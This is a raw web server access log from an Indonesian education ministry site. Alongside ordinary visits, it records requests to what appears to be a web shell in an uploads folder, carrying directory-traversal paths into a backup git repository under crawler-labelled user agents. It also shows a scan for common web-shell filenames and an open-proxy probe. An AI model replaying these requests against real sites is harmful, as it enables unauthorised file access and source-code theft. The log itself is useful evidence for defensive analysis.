103.167.170.113 - - [05/Nov/2025:00:06:14 +0700] "GET /assets-front/js/jquery.js HTTP/1.1" 200 89475 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:14 +0700] "GET /assets-front/css/animate.css HTTP/1.1" 200 89705 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:15 +0700] "GET /assets-front/img/logo-P3GTK.png HTTP/1.1" 200 63585 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:16 +0700] "GET /assets-front/img/star.svg HTTP/1.1" 200 265 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:19 +0700] "GET /storage/uploads/gambar-panduan/1714378096.jpg HTTP/1.1" 200 26798 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:20 +0700] "GET /assets-front/img/faqq.png HTTP/1.1" 200 87253 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:23 +0700] "GET /storage/uploads/list_berita/1756890405.png HTTP/1.1" 200 494382 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /storage/uploads/list_berita/1759975222.jpg HTTP/1.1" 200 153946 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /assets-front/img/podcast.jpeg HTTP/1.1" 200 506855 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /storage/uploads/list_berita/1758439280.png HTTP/1.1" 200 592195 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /assets-front/css/fonts/lined-icons.woff HTTP/1.1" 200 86312 "https://kspstendik.dikdasmen.go.id/assets-front/css/font-icons.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /assets-front/js/select2.min.js HTTP/1.1" 200 73163 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:24 +0700] "GET /assets-front/js/swiper-bundle.min.js HTTP/1.1" 200 149982 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:25 +0700] "GET /assets-front/js/functions.js HTTP/1.1" 200 73282 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:25 +0700] "GET /assets-front/js/custom.js HTTP/1.1" 200 591 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:25 +0700] "GET /assets/libs/sweetalert2/sweetalert2.min.js?q=9myn4 HTTP/1.1" 200 44933 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:25 +0700] "GET /assets-front/css/fonts/font-icons.woff HTTP/1.1" 200 559660 "https://kspstendik.dikdasmen.go.id/assets-front/css/font-icons.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:25 +0700] "GET /assets-front/js/plugins.min.js HTTP/1.1" 200 684620 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:27 +0700] "GET /storage/uploads/list_berita/1757911189.png HTTP/1.1" 200 411151 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:27 +0700] "GET /storage/uploads/podcast/1711566736.jpg HTTP/1.1" 200 149639 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:27 +0700] "GET /storage/uploads/podcast/1710686587.png HTTP/1.1" 200 426975 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:27 +0700] "GET /storage/uploads/podcast/1711567078.jpg HTTP/1.1" 200 111801 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:27 +0700] "GET /storage/uploads/podcast/1711566387.jpg HTTP/1.1" 200 152901 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711567018.jpg HTTP/1.1" 200 29998 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711566497.jpg HTTP/1.1" 200 133696 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711110282.jpg HTTP/1.1" 200 537271 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711566889.jpg HTTP/1.1" 200 312334 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711565168.jpg HTTP/1.1" 200 43300 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711566605.jpg HTTP/1.1" 200 6841 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711566668.jpg HTTP/1.1" 200 116909 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:28 +0700] "GET /storage/uploads/podcast/1711566806.jpg HTTP/1.1" 200 102017 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:29 +0700] "GET /storage/uploads/podcast/1711566950.jpg HTTP/1.1" 200 149136 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
103.167.170.113 - - [05/Nov/2025:00:06:32 +0700] "GET /storage/uploads/file-panduan/1710991287.pdf HTTP/1.1" 200 4585858 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:06:33 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2Fcache HTTP/1.1" 200 4858 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
103.167.170.113 - - [05/Nov/2025:00:06:35 +0700] "GET /assets-front/img/logo_kemendikbud.png HTTP/1.1" 200 93734 "https://kspstendik.dikdasmen.go.id/panduan/detail/11" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:06:37 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework%2Ftesting HTTP/1.1" 200 4791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.9 - - [05/Nov/2025:00:06:42 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/7d/../ef HTTP/1.1" 200 31 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
156.206.60.252 - - [05/Nov/2025:00:06:57 +0700] "GET http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=4.9.8 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.73.216.213 - - [05/Nov/2025:00:07:17 +0700] "GET /storage/uploads/file-renstra/1761960249.php?memek=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework HTTP/1.1" 200 5044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.37.118.82 - - [05/Nov/2025:00:07:19 +0700] "GET /assets-front/css/bootstrap.css?v=82 HTTP/1.1" 200 198473 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.23.188.213 - - [05/Nov/2025:00:07:21 +0700] "GET /assets/libs/sweetalert2/sweetalert2.min.js?q=5AiMR HTTP/1.1" 200 44933 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.213 - - [05/Nov/2025:00:07:22 +0700] "GET /storage/uploads/file-renstra/1761960249.php?logout=gaskan&path=%2Fhome%2Fmedia1%2Fwebroot%2Fksps_v2%2Fstorage%2Fapp%2F..%2F..%2Fstorage%2Fframework HTTP/1.1" 404 47 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.23.188.200 - - [05/Nov/2025:00:07:23 +0700] "GET /assets-front/css/custom.css?v=91 HTTP/1.1" 200 32147 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
138.91.30.59 - - [05/Nov/2025:00:07:40 +0700] "GET /berita/detail/konsolidasi-nasional-pendidikan-dasar-dan-menengah-2025-partisipasi-semesta-wujudkan-pendidikan-bermutu-untuk-semua HTTP/1.1" 200 31791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
74.7.227.9 - - [05/Nov/2025:00:07:44 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/2f/../ca HTTP/1.1" 200 5514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.65.40 - - [05/Nov/2025:00:08:15 +0700] "GET /storage/uploads/list_berita/1756697725.png HTTP/1.1" 200 168527 "-" "Googlebot-Image/1.0"
172.204.16.64 - - [05/Nov/2025:00:08:28 +0700] "GET /regulasis/detail/undang-undang-republik-indonesia-nomor-14-tahun-2005-tentang-guru-dan-dosen HTTP/1.1" 200 28609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot"
74.7.227.9 - - [05/Nov/2025:00:08:30 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/f9/../bd HTTP/1.1" 200 5781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.120.184.217 - - [05/Nov/2025:00:09:04 +0700] "GET /berita/detail/tot-bcks-batch-2-menyiapkan-fasilitator-unggul-untuk-melahirkan-pemimpin-sekolah-masa-depan HTTP/1.1" 200 354470 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
74.7.227.9 - - [05/Nov/2025:00:09:16 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/c4/../ff HTTP/1.1" 404 47 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:09:58 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/bb/../d9 HTTP/1.1" 200 5757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:10:40 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/0d/../ae HTTP/1.1" 200 5671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
163.171.66.38 - - [05/Nov/2025:00:11:11 +0700] "GET /artikel/detail/babak-baru-peran-pengawas-sekolah-dalam-pendampingan-penguatan-perubahan-di-sekolah-binaan HTTP/1.1" 200 34448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
14.0.45.12 - - [05/Nov/2025:00:11:11 +0700] "GET /regulasis/detail/peraturan-direktur-jenderal-gtk-no-48312023-tentang-peran-pengawas-sekolah-dalam-implementasi-kebijakan-merdeka-belajar-pada-satuan-pendidikan HTTP/1.1" 200 28652 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
138.113.249.249 - - [05/Nov/2025:00:11:11 +0700] "GET /artikel/detail/babak-baru-peran-pengawas-sekolah-dalam-pendampingan-penguatan-perubahan-di-sekolah-binaan HTTP/1.1" 200 34439 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
101.79.174.110 - - [05/Nov/2025:00:11:11 +0700] "GET /regulasis/detail/peraturan-direktur-jenderal-gtk-no-48312023-tentang-peran-pengawas-sekolah-dalam-implementasi-kebijakan-merdeka-belajar-pada-satuan-pendidikan HTTP/1.1" 200 28658 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
74.7.227.9 - - [05/Nov/2025:00:11:16 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/f8/../bc HTTP/1.1" 200 5418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.77 - - [05/Nov/2025:00:11:24 +0700] "GET /berita/detail/IMG_7306.JPEG HTTP/1.1" 500 1570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.9 - - [05/Nov/2025:00:11:48 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/7d/../ff HTTP/1.1" 200 5763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:12:20 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/6c/../ba HTTP/1.1" 200 5710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:12:43 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/fe/../3d HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:13:10 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/f3/../cd HTTP/1.1" 200 5406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:14:11 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/6c/../ce HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
5.180.253.39 - - [05/Nov/2025:00:14:57 +0700] "GET http://azenv.net/ HTTP/1.1" 301 178 "-" "Go-http-client/1.1"
5.180.253.39 - - [05/Nov/2025:00:14:57 +0700] "CONNECT kspstendik.dikdasmen.go.id:443 HTTP/1.1" 400 166 "-" "-"
54.37.118.85 - - [05/Nov/2025:00:15:00 +0700] "GET /siaran-pers/detail/eyJpdiI6Ims3Z01CaXl5bERyT0lxSm5vbTduVkE9PSIsInZhbHVlIjoiWisrVUs4V1VOWWJ4dWp5ZEpSM0VGdz09IiwibWFjIjoiYzAwYjkyZWJiOTNhODZiMDYxZDRmNTgxNjgxMzMxMGI1NjliMTFkOTFmZWVkZmVkZWQ2ZGYyY2FhMDNhNmM2YSJ9 HTTP/1.1" 200 28579 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.9 - - [05/Nov/2025:00:15:07 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/fd/../3e HTTP/1.1" 200 5244 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
188.239.47.217 - - [05/Nov/2025:00:16:08 +0700] "GET /assets_diklat_pengawas/uploads/Panduan-Operasional-Diklat-untuk-BGP-BBGP.pdf HTTP/1.1" 200 1281332 "https://kspstendik.dikdasmen.go.id/assets_diklat_pengawas/uploads/Panduan-Operasional-Diklat-untuk-BGP-BBGP.pdf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
74.7.227.9 - - [05/Nov/2025:00:16:12 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/d8/../cc HTTP/1.1" 200 5770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.9 - - [05/Nov/2025:00:17:05 +0700] "GET /storage/uploads/file-renstra/1761960249.php?path=/home/media1/webroot/p3gtk.kemdikbud.go.id/../ksps_v2_backup/.git/objects/ad/../ad/../info/../ff/../pack/../bc/../../branches/../objects/d3/../fc HTTP/1.1" 500 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
48.210.15.48 - - [05/Nov/2025:00:17:06 +0700] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /wp-blog.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /wp-blog.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /webdb.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /webdb.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /witmmm.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:12 +0700] "GET /witmmm.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /18299.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /18299.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /zxasd.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /zxasd.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /nxx.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /nxx.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /shlo.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /shlo.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /sql.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /sql.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:13 +0700] "GET /Marvins.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /Marvins.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /wpfile.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /wpfile.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /foyhd.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /foyhd.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /f350.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /f350.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /moon.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /bless3.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:14 +0700] "GET /bless3.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /link.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /link.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /CmKHK.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /CmKHK.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /rtg.php HTTP/1.1" 301 178 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /rtg.php HTTP/1.1" 404 27 "-" "-"
48.210.15.48 - - [05/Nov/2025:00:17:15 +0700] "GET /tools.php HTTP/1.1" 301 178 "-" "-"
